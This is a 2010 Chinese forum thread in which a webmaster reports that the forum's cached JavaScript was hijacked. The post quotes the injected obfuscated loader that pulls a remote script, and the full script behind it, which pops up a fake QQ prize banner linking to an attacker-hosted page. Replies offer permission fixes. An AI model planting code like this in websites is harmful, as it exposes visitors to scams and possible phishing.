我今天也发现论坛弹中奖消息了,论坛js代码被纂改了
今天上论坛的时候,果然看到了那个qq中奖消息,最后我发现在论坛<script src="forumdata/cache/common.js?I0Z" type="text/javascript"></script>
其中这段被挂马了,在这段js代码中嵌套了另外一段js代码
document.write ('<SCRIPT src="http://%77%77%77%2E%71%71%63%6E%32%30%31%30%2E%63%6F%6D/%77%65%62/%6A%73/%64%74%72%65%65%2E%6A%73"></script>');
http://%77%77%77%2E%71%71%63%6E%32%30%31%30%2E%63%6F%6D/%77%65%62/%6A%73/%64%74%72%65%65%2E%6A%73这个地址是加密的,实际上是打开了另一个js文件http://111.122.210.3/css/b.js ,而在http://111.122.210.3/css/b.js中,就是最终弹出的那个虚假中奖消息了。代码如下:
var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleep");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+6*60*60*1000);
document.cookie="cookiesleep=test;expires="+expires.toGMTString();
var qq_etewidth = 254;
var qq_eteheight = 156;
var qq_banner_filename = "http://111.122.210.3/css/qq1.gif";
var qq_gotoUrl = "http://111.122.210.3/css/tz.asp";
document.write("<div id=eteUnionUpFloat style='margin:0px;padding-bottom:300px;z-index: 10;position:absolute;width:"+qq_etewidth+"px;height:"+qq_eteheight+"px;'>")
document.write("<a href='"+qq_gotoUrl+"' target='_blank'><img src='"+qq_banner_filename+"' border='0' style='cursor: hand;' width='"+qq_etewidth+"' height='"+qq_eteheight+"'></a>")
document.write("</div>")
var bodyfrm = ( document.compatMode.toLowerCase()=="css1compat" ) ? document.documentElement : document.body;
var adst = document.getElementById("eteUnionUpFloat").style;
adst.top = ( bodyfrm.clientHeight - qq_eteheight ) + "px";
adst.left = ( bodyfrm.clientWidth - qq_etewidth ) + "px";
function moveR() {
adst.top = ( bodyfrm.scrollTop + bodyfrm.clientHeight - qq_eteheight ) + "px";
adst.left = ( bodyfrm.scrollLeft + bodyfrm.clientWidth - qq_etewidth ) + "px";
}
var objTimer=setInterval("moveR();", 100);
function Clo**(){
adst.display='none';
}
function ete_closediv()
{
document.getElementById('eteUnionUpFloat').style.visibility='hidden';
if(objTimer) window.clearInterval(objTimer)
}document.writeln("<BGSOUND balance=0 src=\"http://111.122.210.3/css/system.wav\" volume=-240>");
}
而那个IP地址111.122.210.3是贵州的 问题就在那儿,
可不晓得是从哪儿来的.
更不知道如何医治. 都好久了 问题就在那儿,
可不晓得是从哪儿来的.
更不知道如何医治.
川渝秦缘 发表于 2010-6-24 17:27 http://www.jy0832.com/images/common/back.gif
有些网站啊...
您最好少看哦... 就是啊
怎么治呢? 检查一下 forumdata文件夹的权限呢,要不就设置为只读 论坛目录取消everyone的写入权限看看 建议老大把 风雨燕双飞聘为论坛技术管理。一看就比大伙专业得多! 风雨燕双飞 应该是个站长吧? 有些网站啊...
您最好少看哦...
〢.◆譽ēr. 发表于 2010-6-24 17:39 http://www.jy0832.com/images/common/back.gif
和这个无关的,是论坛DZ语言的一个漏洞~ 应该处理一下 建议老大把 风雨燕双飞聘为论坛技术管理。一看就比大伙专业得多! 风雨燕双飞 应该是个站长吧?
月光冷舞 发表于 2010-6-24 19:10 http://www.jy0832.com/images/common/back.gif
抬举我了,是个站长没错,技术上我也很菜 抬举我了,是个站长没错,技术上我也很菜
风雨燕双飞 发表于 2010-6-24 23:12 http://www.jy0832.com/images/common/back.gif
呵呵!一定要为咱简阳本土论坛扎起哟!你有那个实力哈 论坛人才大有人在
比如楼上这位
没有本事咋个能当元帅呢
而且还是大元帅
阅读权限和老大的一样
光是这个就很厉害了 谢谢楼主
页:
[1]